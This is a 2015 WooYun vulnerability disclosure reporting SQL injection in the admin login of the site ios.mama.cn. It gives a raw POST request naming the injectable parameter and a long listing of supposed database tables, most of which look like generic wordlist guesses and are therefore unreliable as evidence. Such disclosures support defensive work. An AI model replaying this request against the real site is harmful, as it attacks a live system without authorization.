当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107821

漏洞标题:妈妈网某后台SQL注入漏洞

相关厂商:妈妈网

漏洞作者: 忽然之间

提交时间:2015-04-14 19:04

修复时间:2015-05-30 15:32

公开时间:2015-05-30 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-25: 细节向核心白帽子及相关领域专家公开
2015-05-05: 细节向普通白帽子公开
2015-05-15: 细节向实习白帽子公开
2015-05-30: 细节向公众公开

简要描述:

妈妈网某后台SQL注入漏洞

详细说明:

POST /index.php HTTP/1.1
Host: ios.mama.cn
Proxy-Connection: keep-alive
Content-Length: 111
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://ios.mama.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://ios.mama.cn/index.php?action=AdminLogin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: mamastatid=vlstat-1428981413000-903033601; GtC_cityid=gz; Hm_lvt_f2babe867b10ece0ff53079ad6c04981=1428981419; Hm_lpvt_f2babe867b10ece0ff53079ad6c04981=1428982072; xloginmama_service=http%253A%252F%252Fwww.gzmama.com%252Fportal.php%253Fget%253D1428982801
sid=vSX77r&frames=no&action=AdminLogin&do=UserLogin&admin_user=admin&admin_pass=admin&submit=%E6%8F%90%E4%BA%A4


注入参数 admin_user

漏洞证明:

Database: admnios
[311 tables]
+---------------------------------------+
| ACL_table                             |
| ALUM                                  |
| Administratoren                       |
| BOOK                                  |
| BRANCH                                |
| Benutzername                          |
| CPG_bridge                            |
| CUENTAS                               |
| CUSTOMERS                             |
| Category                              |
| Catogorie                             |
| ChicksPass                            |
| Class_Display_Sequence                |
| ColdFusion8                           |
| Collection                            |
| CountryCodes1                         |
| CustomNav                             |
| DEPARTMENT                            |
| DSObject_table                        |
| DWE_Resource_Roles                    |
| DataFeedShowtag2                      |
| Defect                                |
| EDITEUR                               |
| ExternalIdentifier                    |
| FORM                                  |
| Factory_Output                        |
| Film                                  |
| GalleryThumb                          |
| INSTITUTE                             |
| Kategorie                             |
| Keyword                               |
| Konten                                |
| Konto                                 |
| LT_CUSTOM3                            |
| LT_EVENTO                             |
| LT_SITUACAO                           |
| Lake                                  |
| Languages                             |
| Linkdesc_table                        |
| LoginIP                               |
| MOMENT                                |
| M_CADASTRO_GERAL                      |
| M_EMAIL_FILA                          |
| MetadataSchemaRegistry                |
| MountainOnIsland                      |
| Orders                                |
| Organization                          |
| POINT                                 |
| PRODUTO                               |
| PROYECTO                              |
| PZ                                    |
| Pays                                  |
| PerfPassword                          |
| Politics                              |
| Priority                              |
| ProjectsTable                         |
| ProxyPriceInfo                        |
| QRTZ_TRIGGER_LISTENERS                |
| SQLDATES                              |
| SS_orders                             |
| Serie                                 |
| Severity                              |
| TBLREPORTS                            |
| THOT_CONCEPT                          |
| THOT_LANGUAGE                         |
| THOT_TARGET                           |
| THOT_YEAR                             |
| TIL_IDIOTON                           |
| UM_PERMISSIONS                        |
| UM_USER_ROLES                         |
| UserAdmin                             |
| Utilisateurs                          |
| Variants                              |
| Venue                                 |
| WROTE                                 |
| Session                               |
| a_admin                               |
| address_book                          |
| addresses                             |
| admin_psw                             |
| adminname                             |
| aidf                                  |
| array_data                            |
| array_test                            |
| auteur                                |
| authenticate                          |
| bayview                               |
| be_users                              |
| binn_articles_messages                |
| binn_basket_templ                     |
| binn_cache                            |
| binn_cform                            |
| binn_ct_templ                         |
| binn_form39                           |
| binn_forum_threads                    |
| binn_order_elems                      |
| binn_site_users_rights                |
| binn_submit_timeout                   |
| binn_templates                        |
| borders                               |
| cdb_attachments                       |
| cdb_bbcodes                           |
| cdb_faqs                              |
| cdb_imagetypes                        |
| cdb_itempool                          |
| cdb_medals                            |
| cdb_paymentlog                        |
| cdv_curation                          |
| cell_line                             |
| child_test                            |
| cmDigitalAsset                        |
| cmEvent                               |
| cocktail_person                       |
| configlist                            |
| control                               |
| creditcards                           |
| customurl                             |
| datasets                              |
| dblist                                |
| dcerpcrequests                        |
| deducao                               |
| dept_location                         |
| diplomatie                            |
| div_generation                        |
| div_stock_parent                      |
| div_treatment                         |
| dtb_bat_order_daily_hour              |
| dtb_bat_relate_products               |
| dtb_classcategory                     |
| dtb_mailmaga_template                 |
| dtb_question                          |
| dtb_table_comment                     |
| dtb_templates                         |
| dw                                    |
| empresa_atividade                     |
| encompasses                           |
| exchangerate                          |
| ezin_sections                         |
| ezsearch_return_count_new             |
| f_attributedefinition                 |
| files                                 |
| flow                                  |
| forum                                 |
| forum_post                            |
| forums                                |
| framework_email                       |
| fruit                                 |
| ganatlebe_ge                          |
| geo_Estuary                           |
| graphs                                |
| grau_escolaridade                     |
| gws_news                              |
| gws_page                              |
| hilfe                                 |
| house_extensions                      |
| index                                 |
| inscription                           |
| intGroups                             |
| investigator                          |
| itemnotafiscal                        |
| items_template                        |
| jiveGroupProp                         |
| jiveRoster                            |
| jos_content_frontpage                 |
| jos_docman_licenses                   |
| jos_menu_types                        |
| jos_migration_backlinks               |
| jos_poll_menu                         |
| jos_polls                             |
| jos_vm_manufacturer                   |
| jos_vm_orders                         |
| jos_vm_product                        |
| jos_vm_product_relations              |
| jos_vm_shipping_label                 |
| jos_vm_state                          |
| klassen                               |
| legacy_things                         |
| lookup                                |
| m_news                                |
| makemodel                             |
| manage                                |
| map_event                             |
| mapdata                               |
| maxcodcorreo                          |
| meetings                              |
| metadata                              |
| mlattach                              |
| mlmail                                |
| mucRoomProp                           |
| mymps_config                          |
| mymps_crons                           |
| nuke_bbposts                          |
| nuke_gallery_rate_check               |
| nuke_groups                           |
| nuke_groups_points                    |
| nuke_journal_comments                 |
| nuke_poll_desc                        |
| nuke_referer                          |
| nuke_related                          |
| oil_biolmed_entity                    |
| oil_biolmed_technician                |
| oil_content                           |
| oil_core_log_searches                 |
| oil_jf_content                        |
| oil_languages                         |
| oil_phocagallery_img_votes_statistics |
| oil_sections                          |
| orgs                                  |
| osc_specials                          |
| p0fs                                  |
| panel                                 |
| pay_melodies                          |
| payment                               |
| pc                                    |
| perfil                                |
| pessoa                                |
| phorum_session                        |
| phorum_user                           |
| phpbb_config                          |
| phpbb_privmsgs                        |
| phpbb_themes                          |
| phpbb_vote_results                    |
| phpbb_vote_voters                     |
| pools                                 |
| produtos                              |
| profile_pictures                      |
| publisher                             |
| pw_wordfb                             |
| qrtz_fired_triggers                   |
| rating                                |
| rec_jobs                              |
| reg                                   |
| reguser                               |
| roles                                 |
| root                                  |
| roster                                |
| rss_category                          |
| seq_gen                               |
| server                                |
| sf_guard_group                        |
| sf_guard_user                         |
| sf_guard_user_group                   |
| site_environment                      |
| site_iwis                             |
| skins                                 |
| smallnuke_members                     |
| smf_members                           |
| sounds                                |
| spip_auteurs_articles                 |
| spip_documents_breves                 |
| spip_referers                         |
| spip_versions                         |
| spt_datatype_info                     |
| statuses                              |
| stellen                               |
| store                                 |
| store1                                |
| t_snap                                |
| tables_priv                           |
| tb_login                              |
| tb_member                             |
| tbaccounts                            |
| tblLogBookImport                      |
| tblNews                               |
| tbl_admin                             |
| tbl_admins                            |
| tbl_nguoidungs                        |
| tblblogcomments                       |
| tblblogsubscribers                    |
| tblclient                             |
| tblnguoidung                          |
| tblogin                               |
| tblogins                              |
| tbluseraccount                        |
| tblusers                              |
| transfers                             |
| tt_address                            |
| tutorial                              |
| tx_tcdirectmail_clicklinks            |
| typeFacture                           |
| user_connection                       |
| user_name                             |
| user_types                            |
| user_usrnm                            |
| userpassword                          |
| users_tmp                             |
| usrnam                                |
| uvw_Category                          |
| uvw_Preferences                       |
| vcd_Covers                            |
| vcd_VcdToPornCategories               |
| vendedores                            |
| vendor_types                          |
| verwalten                             |
| verwaltet                             |
| videos                                |
| voodoo_members                        |
| warehouse                             |
| way_nodes                             |
| webcal_entry_ext_user                 |
| webcal_user                           |
| webcal_view                           |
| webmaster                             |
| win                                   |
| wp_pod_types                          |
| wp_users                              |
| xristes                               |
| yhm                                   |
| zipcodes                              |
| zoph_albums                           |

修复方案:

过滤

版权声明:转载请注明来源 忽然之间@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-15 15:31

厂商回复:

谢谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-14 20:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    看来这妈妈网还真成大厂商了

  2. 2015-04-15 19:42 | O夜莺O ( 路人 | Rank:2 漏洞数:1 | 继续为网络安全护航。)

    大神你QQ多少,求请教。